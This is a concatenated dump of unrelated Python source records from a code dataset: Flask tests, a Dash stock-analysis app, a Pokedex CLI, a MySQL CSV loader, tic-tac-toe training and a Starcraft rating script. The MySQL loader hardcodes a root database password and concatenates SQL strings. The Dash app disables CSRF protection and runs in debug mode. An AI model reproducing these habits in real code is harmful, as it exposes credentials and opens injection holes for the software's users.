input.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"594318274","text":"#!/usr/bin/env python\n\nimport unittest\nfrom mock import patch\nfrom mock import MagicMock\n\nfrom flask import request\nfrom StringIO import StringIO\nfrom src.app import espaweb\nfrom src.mocks import app as mock_app\nfrom src.utils import User\n\n\nclass ApplicationTestCase(unittest.TestCase):\n\n def setUp(self):\n self.app = espaweb.test_client()\n self.app.testing = True\n self.default_sceneid = 'LE70270292003144EDC00'\n self.form_order = mock_app.form_order\n\n user_parms = {'email': 'foo@gmail.com',\n 'username': 'foo',\n 'wurd': 'bar',\n 'roles': ['staff']}\n\n self.user = User(**user_parms)\n\n with espaweb.test_client() as c:\n with c.session_transaction() as sess:\n sess['logged_in'] = True\n sess['user'] = self.user\n\n self.client = c\n\n def tearDown(self):\n pass\n\n def test_login_get(self):\n result = self.app.get('/login')\n self.assertEqual(result.status_code, 200)\n self.assertTrue('Ordering Interface ' in result.data)\n\n @patch('src.app.api_get', mock_app.api_get_user)\n @patch('src.app.update_status_details', mock_app.update_status_details_true)\n def test_login_post_success(self):\n data_dict = {'username': self.user.username, 'password': self.user.wurd}\n result = self.app.post('/login', data=data_dict)\n # successful login redirects to /index\n self.assertTrue(\">/index/\" in result.data)\n self.assertEqual(result.status_code, 302)\n\n @patch('src.app.api_get', mock_app.api_get_user_fail)\n def test_login_post_fail(self):\n data_dict = {'username': self.user.username, 'password': self.user.wurd}\n result = self.client.post('/login', data=data_dict)\n self.assertEqual(result.status_code, 401)\n\n def test_get_logout(self):\n result = self.client.get('/logout')\n # results in a redirect to the login page\n self.assertTrue(\">/login\" in result.data)\n self.assertEqual(result.status_code, 302)\n\n def test_get_index(self):\n result = self.client.get('/index/')\n self.assertTrue(\"ESPA - LSRD\" in result.data)\n self.assertEqual(result.status_code, 200)\n\n def test_get_new_order(self):\n result = self.client.get(\"/ordering/new/\")\n self.assertTrue(\"

New Bulk Order

\" in result.data)\n self.assertEqual(result.status_code, 200)\n\n @patch('src.app.api_up', mock_app.api_post_order)\n def test_submit_order_post_success(self):\n data = self.form_order\n data['input_product_list'] = (StringIO(self.default_sceneid), 'in.txt')\n result = self.client.post(\"/ordering/submit/\",\n content_type='multipart/form-data',\n data=data)\n self.assertTrue(\"/ordering/order-status/bob@google.com-03072016-085432/\" in result.data)\n self.assertEqual(result.status_code, 302)\n\n @patch('src.app.api_get', mock_app.api_get_list_orders)\n def test_get_list_orders(self):\n result = self.client.get(\"/ordering/status/\")\n self.assertTrue(\"ESPA - ESPA Reports \" in result.data)\n self.assertEqual(result.status_code, 200)\n\n @patch('src.app.api_get', mock_app.api_get_order_status)\n def test_get_view_order(self):\n result = self.client.get(\"/ordering/order-status/bob@google.com-12345-9876/\")\n self.assertTrue(\"Details for: bob@google.com-12345-9876\" in result.data)\n self.assertEqual(result.status_code, 200)\n\n @patch('src.app.api_get', mock_app.api_get_reports)\n def test_get_list_reports(self):\n result = self.client.get(\"/reports/\")\n self.assertTrue(\"ESPA - ESPA Reports\" in result.data)\n self.assertEqual(result.status_code, 200)\n\n @patch('src.app.api_get', mock_app.api_get_show_report)\n def test_get_show_report(self):\n result = self.client.get(\"/reports/orders_counts/\")\n self.assertTrue(\"<h4>orders_counts Report</h4>\" in result.data)\n self.assertEqual(result.status_code, 200)\n\n @patch('src.app.api_get', mock_app.api_get_stats_all)\n def test_get_console(self):\n result = self.client.get(\"/console\")\n self.assertTrue(\"<h4>ESPA Console</h4>\" in result.data)\n self.assertEqual(result.status_code, 200)\n\n @patch('src.app.update_status_details', mock_app.update_status_details_true)\n @patch('src.app.api_up', mock_app.api_post_status)\n def test_post_statusmsg(self):\n data = {'display_system_message': 'on', 'system_message_title': 'foo',\n 'system_message_body': 'bar'}\n result = self.client.post(\"/console/statusmsg\", data=data)\n self.assertTrue(\"<p>You should be redirected automatically to target URL: \"\n \"<a href=\\\"/index/\\\">/index/</a>\" in result.data)\n self.assertEqual(result.status_code, 302)\n\n @patch('src.app.api_get', mock_app.api_get_system_config)\n def test_get_console_config(self):\n result = self.client.get(\"/console/config\")\n self.assertEqual(result.status_code, 200)\n\n @patch('src.app.api_get', mock_app.api_get_rss_feed)\n def test_get_rss_feed(self):\n result = self.client.get(\"/ordering/status/bob@gmail.com/rss/\")\n self.assertEquals(result.status_code, 200)\n\n\n\n\n\n\n\n\n\n","sub_path":"test/test_web_transport.py","file_name":"test_web_transport.py","file_ext":"py","file_size_in_byte":5409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"548793817","text":"from datetime import datetime, timedelta\r\n\r\nimport dash\r\nimport dash_bootstrap_components as dbc\r\nimport dash_core_components as dcc\r\nimport dash_html_components as html\r\nimport numpy as np\r\nimport pandas as pd\r\nimport plotly.graph_objs as go\r\nimport settings\r\nimport stock_info\r\nfrom dash.dependencies import Input, Output\r\nfrom future_value import get_future_value\r\nfrom pandas_datareader import data as web\r\nfrom stock_evaluation import get_stock_evaluation\r\nfrom stock_list import combine_stock_list\r\n\r\nBULL_LOGO = \"static/img/bull.png\"\r\nBEAR_LOGO = \"static/img/bear.png\"\r\n\r\nstart_date = datetime.now() - timedelta(days=365)\r\nend_date = datetime.now()\r\nstocks = combine_stock_list()\r\n\r\nnavbar = dbc.Navbar(\r\n [\r\n html.A(\r\n dbc.Row(\r\n [\r\n dbc.Col(html.Img(src=BULL_LOGO, height=\"40px\")),\r\n dbc.Col(dbc.NavbarBrand(\"VALUE STOCK ANALYSIS\", className=\"ml-2\")),\r\n dbc.Col(html.Img(src=BEAR_LOGO, height=\"40px\")),\r\n ],\r\n align=\"center\",\r\n no_gutters=True,\r\n ),\r\n href=\"#\",\r\n ),\r\n dbc.NavbarToggler(id=\"navbar-toggler\"),\r\n ],\r\n color=\"dark\",\r\n dark=True,\r\n)\r\n\r\nbody = dbc.Container(\r\n [\r\n dbc.Row(\r\n [\r\n dbc.Col(\r\n [\r\n html.H5('Choose a Stock'),\r\n dcc.Dropdown(\r\n id='stock-list',\r\n options= stocks,\r\n value='GOOG'\r\n ),\r\n html.Br(),\r\n html.H5('Select a Date Range'),\r\n dcc.DatePickerRange(\r\n id='date-picker-range',\r\n start_date=datetime(start_date.year,start_date.month,start_date.day),\r\n end_date=datetime(end_date.year,end_date.month,end_date.day),\r\n calendar_orientation='vertical',\r\n ),\r\n dcc.Graph(id='stock-graph'),\r\n \r\n html.Div(id='financial-reports'),\r\n html.H5('Stock Evaluation'),\r\n html.Div(id='stock-evaluation'),\r\n html.Br(),\r\n \r\n html.H5('Future/Current Value and Recommendation'),\r\n html.Div(id='future-value'),\r\n ]\r\n ),\r\n ]\r\n )\r\n ],\r\n className=\"mt-4\",\r\n)\r\n\r\napp = dash.Dash(\r\n __name__, \r\n external_stylesheets=[dbc.themes.BOOTSTRAP],\r\n static_folder='static',\r\n csrf_protect=False\r\n )\r\n\r\nserver = app.server\r\n\r\napp.title = 'Value Stock Analysis'\r\napp.layout = html.Div([navbar, body])\r\n\r\n@app.callback(Output('stock-graph', 'figure'), \r\n [\r\n Input('stock-list', 'value'), \r\n Input('date-picker-range', 'start_date'), \r\n Input('date-picker-range', 'end_date')\r\n ])\r\n\r\ndef update_graph(symbol, start_date, end_date):\r\n stock_prices = web.DataReader(symbol, data_source='yahoo', start=start_date, end=end_date)\r\n\r\n adj_close = go.Scatter(\r\n x = stock_prices.index,\r\n y = stock_prices['Adj Close'],\r\n name = 'Adj Close'\r\n )\r\n exp_20_days = go.Scatter(\r\n x = stock_prices.index,\r\n y = stock_prices['Adj Close'].ewm(span=20, adjust=False).mean(),\r\n name = '20 Days EMA'\r\n )\r\n exp_50_days = go.Scatter(\r\n x = stock_prices.index,\r\n y = stock_prices['Adj Close'].ewm(span=50, adjust=False).mean(),\r\n name = '50 Days EMA'\r\n )\r\n \r\n\r\n data = [adj_close, exp_20_days, exp_50_days]\r\n \r\n layout = go.Layout(\r\n yaxis=dict(\r\n title='Adj Close'\r\n ),\r\n )\r\n return{\r\n 'data': data,\r\n 'layout': layout\r\n }\r\n\r\n@app.callback(Output('financial-reports', 'children'), [Input('stock-list', 'value')])\r\ndef update_table(symbol):\r\n stock_info.get_stock_info(symbol)\r\n df_financial_reports = stock_info.combine_financial_reports()\r\n df_financial_reports = df_financial_reports.loc[:, ~df_financial_reports.columns.str.contains('^Unnamed')]\r\n return dbc.Table.from_dataframe(df_financial_reports, striped=True, bordered=True, hover=False, index=True)\r\n\r\n@app.callback(Output('stock-evaluation', 'children'), [Input('financial-reports', 'children')])\r\ndef update_table(symbol):\r\n evaluations = get_stock_evaluation()\r\n\r\n if(any(evaluations)): # if any reason exists\r\n return html.Span(\r\n html.H5(\r\n [\r\n dbc.Badge(evaluation, pill=True, color=\"danger\", className=\"mr-1\") for evaluation in evaluations\r\n ]\r\n )\r\n )\r\n else:\r\n return html.H5(dbc.Badge(\"GOOD\", pill=True, color=\"success\", className=\"mr-1\"))\r\n\r\n@app.callback(Output('future-value', 'children'), [Input('financial-reports', 'children')])\r\ndef update_table(symbol):\r\n future_value = get_future_value()\r\n return dbc.Table.from_dataframe(future_value, striped=True, bordered=True, hover=False, index=True)\r\n\r\nif __name__ == '__main__':\r\n app.run_server(debug=True)\r\n","sub_path":"dash_app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"645368945","text":"# -*- coding: utf-8 -*-\nfrom openregistry.lots.core.utils import (\n json_view,\n context_unpack,\n APIResource,\n)\nfrom openregistry.lots.core.utils import (\n oplotsresource, apply_patch, save_lot\n)\nfrom openregistry.lots.loki.utils import (\n process_caravan_contract_report_result\n)\nfrom openregistry.lots.loki.validation import (\n validate_contracts_data,\n)\npatch_validators = (\n validate_contracts_data\n)\n\n\n@oplotsresource(name='loki:Lot Contracts',\n collection_path='/lots/{lot_id}/contracts',\n path='/lots/{lot_id}/contracts/{contract_id}',\n _internal_type='loki',\n description=\"Lot related contracts\")\nclass LotContractResource(APIResource):\n\n @json_view(permission='view_lot')\n def collection_get(self):\n \"\"\"Lot Contract List\"\"\"\n collection_data = [i.serialize(\"view\") for i in self.context.contracts]\n return {'data': collection_data}\n\n @json_view(permission='view_lot')\n def get(self):\n \"\"\"Lot Contract Read\"\"\"\n contract = self.request.validated['contract']\n return {'data': contract.serialize(\"view\")}\n\n @json_view(content_type=\"application/json\", permission='upload_lot_contracts', validators=patch_validators)\n def patch(self):\n \"\"\"Lot Contract Update\"\"\"\n apply_patch(self.request, save=False, src=self.request.context.serialize())\n if self.request.authenticated_role == 'caravan':\n process_caravan_contract_report_result(self.request)\n if save_lot(self.request):\n self.LOGGER.info(\n 'Updated lot contract {}'.format(self.request.context.id),\n extra=context_unpack(self.request, {'MESSAGE_ID': 'lot_contract_patch'})\n )\n return {'data': self.request.context.serialize(\"view\")}\n","sub_path":"openregistry/lots/loki/views/lot_contracts.py","file_name":"lot_contracts.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"198769735","text":"def word_count(s):\n word_count = {}\n for word in s:\n word_count.setdefault(word, 0)\n word_count[word] += 1\n return word_count\n\ninput_text = open('read_files/moby_clean.txt', 'r')\ns = input_text.read().split()\ninput_text.close()\n\nlst_count = list(word_count(s).items())\nlst_count.sort(key=lambda i: i[1])\n\nprint('most popular:')\nfor i in range(len(lst_count) - 1, len(lst_count) - 6, -1):\n print(lst_count[i])\n\nprint('\\nleast popular:')\nfor i in range(0, 5):\n print(lst_count[i])\n","sub_path":"lesson_10/moby_stat.py","file_name":"moby_stat.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"365540864","text":"import pokedex_API\n\ndef output(search_result: dict) -> None:\n hp = attack = defense = speed = None\n type = ''\n \n list_of_stats = search_result['stats'] #stores a list of dictionaries containing stats\n list_of_types = search_result['types'] #stores a list of dictionaries containing types\n \n for stat in list_of_stats: #stat is an individual dictionary\n if stat['stat']['name'] == 'hp':\n hp = str(stat['base_stat'])\n elif stat['stat']['name'] == 'attack':\n attack = str(stat['base_stat'])\n elif stat['stat']['name'] == 'defense':\n defense = str(stat['base_stat'])\n elif stat['stat']['name'] == 'speed':\n speed = str(stat['base_stat'])\n \n for t in list_of_types:\n type += t['type']['name'] + ', '\n \n print('Pokemon: ' + search_result['name'])\n print('Type: ' + type[:-2])\n print('Weight: ' + str(search_result['weight']) + ' kg') \n print('HP: ' + hp) \n print('Attack: ' + attack)\n print('Defense: ' + defense)\n print('Speed: ' + speed + '\\n')\n\n \ndef input_number() -> list:\n number = int(input(\"Enter Dex Number: \"))\n return number\n\ndef final() -> None:\n while True:\n result = pokedex_API.get_result(pokedex_API.build_v2_url(input_number()))\n output(result)\n\nif __name__ == '__main__':\n final()\n","sub_path":"pokedex_UI.py","file_name":"pokedex_UI.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"514369127","text":"import os\nimport MySQLdb\nimport time\nfrom warnings import filterwarnings\n\n# Open database connection\ndb = MySQLdb.connect(\"localhost\",\"root\",\"4oq5ue2hw\",\"db\" )\ncursor = db.cursor()\nfilterwarnings('ignore', category = db.Warning)\n\n# declare variables\nrelative_path = \"/Users/andy/Desktop/andar/andar\"\n\ndef csvList():\n path = relative_path + \"/\"\n array = []\n for file in os.listdir(path):\n if file.endswith(\".csv\"):\n # print(file.replace(\"_spider.py\", \"\"))\n array.append(file.replace(\".csv\",\"\"))\n return array\n\ndef insert_data(csv):\n sql = \"LOAD DATA LOCAL INFILE '\" + relative_path + \"/\" + csv + \".csv' INTO TABLE \" + csv + \" FIELDS TERMINATED BY ',' IGNORE 1 ROWS;\"\n cursor.execute(sql)\n print(\"Data uploaded in SQL for \" + csv)\n #commit the data\n db.commit()\n\n#get list of csv\ncsv_list = csvList()\n\n# upload to SQL (NOT WORKING/ SKIPPING THIS FOR LOOP)!!!!\nfor csv in csv_list:\n insert_data(csv)\n","sub_path":"scraper3/modules/upload_all.py","file_name":"upload_all.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"631962812","text":"import collections\nimport random\nimport pickle\nimport numpy as np\nimport time\nfrom copy import copy\n\nfrom filelock import FileLock\n\n\n\nfrom xo_game.techniques import monte_carlo_tree_play\nfrom xo_game.techniques import monte_carlo_tree_search_uct_with_value\nfrom xo_game.games.tic_tac_toe_x import TicTacToeXGameSpec\nfrom xo_game.techniques import min_max_alpha_beta\n\nstate_results = collections.defaultdict(float)\nstate_samples = collections.defaultdict(float)\nstate_values = collections.defaultdict(float)\n\nstate_results_old = collections.defaultdict(float)\nstate_samples_old = collections.defaultdict(float)\nstate_values_old = collections.defaultdict(float)\n\nlock = FileLock(\"mont_state_results.lock\")\n\nwith lock:\n with open('mont_state_results.p', mode='rb') as f:\n state_results = pickle.load(f)\n with open('mont_state_samples.p', mode='rb') as f:\n state_samples = pickle.load(f)\n with open('mont_state_values.p', mode='rb') as f:\n state_values = pickle.load(f)\n\nstate_results_old = copy(state_results)\nstate_samples_old = copy(state_samples)\nstate_values_old = copy(state_values)\n\n# state_samples2 = dict(state_samples)\n# for x in state_samples2:\n# if state_samples[x] == 0:\n# del state_samples[x]\n\n\n# model = gen_model()\n# model.load_weights(filepath='value_network_keras')\n\ngame_spec = TicTacToeXGameSpec(winning_length=5, board_size=10)\n\n\ndef make_move_min_max(board_state, side):\n start_time = time.time()\n move = min_max_alpha_beta(game_spec, board_state, side, 2)[1]\n end_time = time.time()\n # print(move, side, end_time - start_time, 'minimax')\n return move\n\n\ndef make_move_min_max_train(board_state, side):\n move = min_max_alpha_beta(game_spec, board_state, side, 1)[1]\n return move\n\n\n# def value_func(board_state):\n# result = model.predict(np.array(board_state).reshape(1, 10, 10, 1))\n#\n# return result\n\n\ndef make_move_network_train(board_state, side):\n start_time = time.time()\n avg_result, move = monte_carlo_tree_search_uct_with_value(game_spec, board_state, side, 0.7,\n state_results, state_samples,\n make_move_min_max_train)\n end_time = time.time()\n # print(move, side, end_time - start_time, 'montecarlo', avg_result)\n return move\n\n\ndef make_move_network(board_state, side):\n start_time = time.time()\n move = monte_carlo_tree_play(game_spec, board_state, side,\n state_results, state_samples, make_move_min_max_train)\n end_time = time.time()\n # print(move, side, end_time - start_time, 'montecarlo')\n return move\n\n\nresults = []\nnum = 0\nwhile True:\n # randomize if going first or second\n if bool(random.random() > 0.5):\n reward = -game_spec.play_game(make_move_min_max, make_move_network_train)\n else:\n reward = game_spec.play_game(make_move_network_train, make_move_min_max)\n\n results.append(1 if reward > 0 else 0)\n print(reward)\n num += 1\n if num % 10 == 0:\n print(np.sum(np.array(results)) / num, num)\n with lock:\n with open('mont_state_results.p', mode='rb') as f:\n state_results_copy = pickle.load(f)\n with open('mont_state_samples.p', mode='rb') as f:\n state_samples_copy = pickle.load(f)\n with open('mont_state_values.p', mode='rb') as f:\n state_values_copy = pickle.load(f)\n\n\n def dsum(dict1, dict2, dict3):\n ret = collections.defaultdict(float)\n\n for k, v in dict2.items():\n ret[k] += dict1[k] + dict2[k] - dict3[k]\n if dict2[k] != 0 and ret[k] == 0:\n ret[k] = dict2[k]\n return ret\n\n\n state_results = dsum(state_results_copy, state_results, state_results_old)\n state_samples = dsum(state_samples_copy, state_samples, state_samples_old)\n state_values = {**state_values, **state_values_copy}\n\n with lock:\n with open('mont_state_results.p', mode='wb') as f:\n pickle.dump(state_results, f)\n with open('mont_state_values.p', mode='wb') as f:\n pickle.dump(state_values, f)\n with open('mont_state_samples.p', mode='wb') as f:\n pickle.dump(state_samples, f)\n\n with open('mont_state_results_copy.p', mode='wb') as f:\n pickle.dump(state_results, f)\n with open('mont_state_values_copy.p', mode='wb') as f:\n pickle.dump(state_values, f)\n with open('mont_state_samples_copy.p', mode='wb') as f:\n pickle.dump(state_samples, f)\n\n state_results_old = copy(state_results)\n state_samples_old = copy(state_samples)\n state_values_old = copy(state_values)\n","sub_path":"xo_game/train_monte_carlo.py","file_name":"train_monte_carlo.py","file_ext":"py","file_size_in_byte":4839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"525125574","text":"#!/usr/bin/python\n\n'''\nThis script will recompute the ratings for a given period.\n\n./period.py <period_id>\n\nThe script will yield an error message if there are untreated matches from previous periods, or if previous\nperiods are marked as not computed.\n\nIf you recompute all the ratings, consider commenting the last line (call to domination.py), see the comment\nfor more details.\n'''\n\nimport sys, os\nfrom numpy import *\n\n# This is required for Django imports to work correctly\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"aligulac.settings\")\n\nfrom django.db import connection, transaction\nfrom django.db.models import Q, F\nfrom ratings.models import Period, Player, Rating, Match\nfrom ratings.tools import filter_active_ratings, start_rating\nfrom aligulac.parameters import RATINGS_INIT_DEV, RATINGS_MIN_DEV, RATINGS_DEV_DECAY,\\\n OFFLINE_WEIGHT, KR_START, KR_END, KR_RATE\n\nfrom rating import update, performance\nfrom ratings.tools import cdf\n\n# Parameters for rating computation\nRACES = 'PTZ'\nEXRACES = 'M' + RACES # 'M' is 'MEAN'\n\nKR_RATING = start_rating('KR', int(sys.argv[1]));\n\n# This is a meta class holding information about rating computation\nclass CPlayer:\n def __init__(self):\n self.prev_rating = dict() # A dict mapping EXRACES to ratings\n self.prev_dev = dict() # A dict mapping EXRACES to RDs\n self.oppc = [] # Opponent categories\n self.oppr = [] # Opponent ratings\n self.oppd = [] # Opponent RDs\n self.W = [] # Number of wins\n self.L = [] # Number of losses\n self.player = None # Django Player object\n self.prev_rating_obj = None # Django previous Rating object\n\n # Returns previous ratings in an array\n def get_rating_array(self):\n ret = []\n for r in EXRACES:\n ret.append(self.prev_rating[r])\n return array(ret)\n\n # Returns previous RDs in an array\n def get_dev_array(self):\n ret = []\n for r in EXRACES:\n ret.append(self.prev_dev[r])\n return array(ret)\n\ndef get_new_players(cplayers, period, prev):\n \"\"\"Collects information about all new players, and adds them to the cplayers dict if not already there.\"\"\"\n\n players = Player.objects.filter(Q(match_pla__period=period) | Q(match_plb__period=period))\n if prev is not None:\n players = players.exclude(rating__period=prev)\n\n for player in players.distinct():\n cp = CPlayer()\n cp.player = player\n cp.prev_rating_obj = None\n\n # Fill in the previous rating information\n for r in EXRACES:\n cp.prev_rating[r] = 0.0\n cp.prev_dev[r] = RATINGS_INIT_DEV\n\n if player.country == 'KR':\n cp.prev_rating['M'] = KR_RATING\n\n # Add to the dict\n cplayers[player.id] = cp\n\ndef get_existing_players(cplayers, prev):\n \"\"\"Collects information about all players already rated, and adds them to the cplayers dict.\"\"\"\n\n ratings = Rating.objects.filter(period=prev).select_related('player')\n for rating in ratings:\n cp = CPlayer()\n cp.player = rating.player\n cp.prev_rating_obj = rating\n\n # Fill in the previous rating information\n for r in RACES:\n cp.prev_rating[r] = rating.get_rating(r)\n cp.prev_dev[r] = rating.get_dev(r)\n cp.prev_rating['M'] = rating.get_rating()\n cp.prev_dev['M'] = rating.get_dev()\n\n # Add to the dict\n cplayers[rating.player.id] = cp\n\ndef decay_dev(cp):\n \"\"\"Decays the RD of a player.\"\"\"\n for r in EXRACES:\n cp.prev_dev[r] = min(sqrt(cp.prev_dev[r]**2 + RATINGS_DEV_DECAY**2), RATINGS_INIT_DEV)\n\ndef get_matches(cplayers, period):\n \"\"\"\n Collects all results during a period and adds them to the cplayer objects.\n Returns the number of games played.\n \"\"\"\n\n # Useful meta function to add a match to a cplayer object\n def add(cp_my, cp_op, rc_my, rc_op, sc_my, sc_op, weight=1.0):\n cp_my.oppc.append(RACES.index(rc_op))\n cp_my.oppr.append(cp_op.prev_rating['M'] + cp_op.prev_rating[rc_my])\n cp_my.oppd.append(sqrt(cp_op.prev_dev['M']**2 + cp_op.prev_dev[rc_my]**2))\n cp_my.W.append(weight * sc_my)\n cp_my.L.append(weight * sc_op)\n\n # Counter for number of games\n ngames = 0\n\n # Loop over all matches\n matches = Match.objects.filter(period=period).select_related('pla', 'plb')\n for m in matches:\n # Get cplayer objects\n cpa = cplayers[m.pla.id]\n cpb = cplayers[m.plb.id]\n\n # Set the played races for each player. For the vast majority of matches this should be a single item\n # list per player. When a player plays as random, or an unrecognized race, it will be treated as even\n # weight over all the three races\n rcas = [m.rca] if m.rca in RACES else RACES\n rcbs = [m.rcb] if m.rcb in RACES else RACES\n weight = float(1)/len(rcas)/len(rcbs)\n\n if m.offline:\n weight *= OFFLINE_WEIGHT\n\n # For each race combination, add information to the cplayer objects\n for ra in rcas:\n for rb in rcbs:\n add(cpa, cpb, ra, rb, m.sca, m.scb, weight)\n add(cpb, cpa, rb, ra, m.scb, m.sca, weight)\n\n # Count games\n ngames += m.sca + m.scb\n\n return ngames\n\ndef array_to_dict(ar):\n \"\"\"Transforms a rating/RD dict to an array.\"\"\"\n d = dict()\n d['M'] = ar[0]\n d['P'] = ar[1]\n d['T'] = ar[2]\n d['Z'] = ar[3]\n return d\n\n# Main code for this script\nif __name__ == '__main__':\n # Get period\n try:\n period = Period.objects.get(id=int(sys.argv[1]))\n except:\n print('No such period.')\n sys.exit(1)\n\n print('Period {0}: from {1} to {2}'.format(period.id, period.start, period.end))\n\n # Check that all previous periods are computed\n prev = Period.objects.filter(id__lt=period.id, computed=False)\n if prev.exists():\n print('Previous period #%i not computed. Aborting.' % prev[0].id)\n sys.exit(1)\n\n # Find the previous period if it exists\n try:\n prev = Period.objects.get(id=period.id-1)\n except:\n prev = None\n\n # Get all cplayer objects\n cplayers = dict()\n if prev:\n get_existing_players(cplayers, prev)\n get_new_players(cplayers, period, prev)\n\n # Update RDs since a period has passed\n for cp in cplayers.values():\n decay_dev(cp)\n\n # Collect match information\n num_games = get_matches(cplayers, period)\n print('Initialized: {0} players and {1} games. Updating...'.format(len(cplayers), num_games))\n\n # Update ratings\n num_retplayers = 0\n num_newplayers = 0\n for cp in cplayers.values():\n (newr, newd) = update(cp.get_rating_array(), cp.get_dev_array(),\n array(cp.oppr), array(cp.oppd), array(cp.oppc), array(cp.W), array(cp.L),\n cp.player.tag, False)\n\n cp.new_rating = array_to_dict(newr)\n cp.new_dev = array_to_dict(newd)\n\n perf = performance(array(cp.oppr), array(cp.oppd), array(cp.oppc), array(cp.W), array(cp.L))\n\n cp.comp_rat = array_to_dict(perf)\n\n # Count player as returning or new\n if len(cp.W) > 0 and cp.prev_rating_obj:\n num_retplayers += 1\n elif len(cp.W) > 0:\n num_newplayers += 1\n #sys.exit(0)\n\n # Get a table of existing rating objects\n existing = set()\n for i in Rating.objects.filter(period=period).values('player_id'):\n existing.add(i['player_id'])\n\n # Write ratings to database\n print('Saving ratings and bookkeping...')\n\n update_qvals, insert_qvals = [], []\n for cp in cplayers.values():\n tup = (cp.new_rating['M'], cp.new_rating['P'], cp.new_rating['T'], cp.new_rating['Z'],\n cp.new_dev['M'], cp.new_dev['P'], cp.new_dev['T'], cp.new_dev['Z'],\n cp.comp_rat['M'], cp.comp_rat['P'], cp.comp_rat['T'], cp.comp_rat['Z'])\n\n if cp.player.id not in existing:\n to = insert_qvals\n tup += tup[0:8]\n else:\n to = update_qvals\n\n if len(cp.W) == 0 and cp.prev_rating_obj is not None:\n tup += (cp.prev_rating_obj.decay+1,)\n else:\n tup += (0,)\n\n tup += (cp.player.id, period.id)\n to.append(tup)\n\n cursor = connection.cursor()\n cursor.executemany('''UPDATE ratings_rating \n SET rating=%s, rating_vp=%s, rating_vt=%s, rating_vz=%s,\n dev=%s, dev_vp=%s, dev_vt=%s, dev_vz=%s,\n comp_rat=%s, comp_rat_vp=%s, comp_rat_vt=%s, comp_rat_vz=%s,\n decay=%s\n WHERE player_id=%s AND period_id=%s''', update_qvals)\n cursor.executemany('''INSERT INTO ratings_rating \n (rating, rating_vp, rating_vt, rating_vz,\n dev, dev_vp, dev_vt, dev_vz,\n comp_rat, comp_rat_vp, comp_rat_vt, comp_rat_vz,\n bf_rating, bf_rating_vp, bf_rating_vt, bf_rating_vz,\n bf_dev, bf_dev_vp, bf_dev_vt, bf_dev_vz,\n decay, player_id, period_id)\n VALUES\n (%s, %s, %s, %s,\n %s, %s, %s, %s,\n %s, %s, %s, %s,\n %s, %s, %s, %s,\n %s, %s, %s, %s,\n %s, %s, %s)''', insert_qvals)\n\n # Set all matches to treated\n Match.objects.filter(period=period).update(treated=True)\n\n # Compute OP/UP race\n def mean(a):\n return sum([f.rating for f in a])/len(a)\n rp = mean(Rating.objects.filter(period=period, player__race='P', decay__lt=4).order_by('-rating')[:5])\n rt = mean(Rating.objects.filter(period=period, player__race='T', decay__lt=4).order_by('-rating')[:5])\n rz = mean(Rating.objects.filter(period=period, player__race='Z', decay__lt=4).order_by('-rating')[:5])\n sp = cdf(rp-rt) + cdf(rp-rz)\n st = cdf(rt-rp) + cdf(rt-rz)\n sz = cdf(rz-rp) + cdf(rz-rt)\n period.dom_p = sp\n period.dom_t = st\n period.dom_z = sz\n\n # Write some period statistics\n period.num_retplayers = num_retplayers\n period.num_newplayers = num_newplayers\n period.num_games = num_games\n period.computed = True\n period.needs_recompute = False\n period.save()\n\n # Write ranks\n ratings = list(filter_active_ratings(Rating.objects.filter(period=period)))\n for index, rating in enumerate(sorted(ratings, key=lambda r: r.rating, reverse=True)):\n rating.position = index + 1\n for index, rating in enumerate(sorted(ratings, key=lambda r: r.rating + r.rating_vp, reverse=True)):\n rating.position_vp = index + 1\n for index, rating in enumerate(sorted(ratings, key=lambda r: r.rating + r.rating_vt, reverse=True)):\n rating.position_vt = index + 1\n for index, rating in enumerate(sorted(ratings, key=lambda r: r.rating + r.rating_vz, reverse=True)):\n rating.position_vz = index + 1\n for rating in ratings:\n rating.save()\n\n # Recompute the hall of fame\n # NOTE: If you compute several periods after one another, it might be wise to comment this and run it only\n # after the last rating computation, as it takes time to run and adds up quickly.\n # os.system('./domination.py')\n","sub_path":"aligulac/period.py","file_name":"period.py","file_ext":"py","file_size_in_byte":11600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"414164523","text":"# rewind-client talks to rewind, an event store server.\n#\n# Copyright (C) 2012 Jens Rantil\n#\n# This program is distributed under the MIT License. See the file LICENSE.txt\n# for details.\n\n\"\"\"Test code format and coding standards.\"\"\"\nfrom __future__ import print_function\nimport os\nimport pep8\nimport pep257\nimport unittest\n\n\nclass TestCodeFormat(unittest.TestCase):\n\n \"\"\"Tests that asserts code quality.\"\"\"\n\n @classmethod\n def setUpClass(cls):\n \"\"\"Create a list of all Python files in Rewind.\"\"\"\n cls._pyfiles = cls._get_all_pyfiles()\n\n @staticmethod\n def _get_all_pyfiles():\n \"\"\"Return a list of all Python files in Rewind.\"\"\"\n while not os.getcwd().endswith('rewind'):\n os.chdir('..')\n os.chdir('..')\n\n pyfiles = []\n for dirpath, _, filenames in os.walk('rewind'):\n pyfiles.extend([os.path.join(dirpath, filename)\n for filename in filenames\n if filename.endswith('.py')])\n assert len(pyfiles) > 0, os.getcwd()\n return pyfiles\n\n def testPep8Conformance(self):\n \"\"\"Test that we conform to PEP8.\"\"\"\n pep8style = pep8.StyleGuide()\n result = pep8style.check_files(self._pyfiles)\n\n # Currently two E301:s fail. I find those checks to be\n # buggy and will report them to the pep8 project on github.\n self.assertEqual(result.total_errors, 0,\n \"Found code syntax errors (and warnings).\")\n\n def testPep257Conformance(self):\n \"\"\"Test that we conform to PEP257.\"\"\"\n 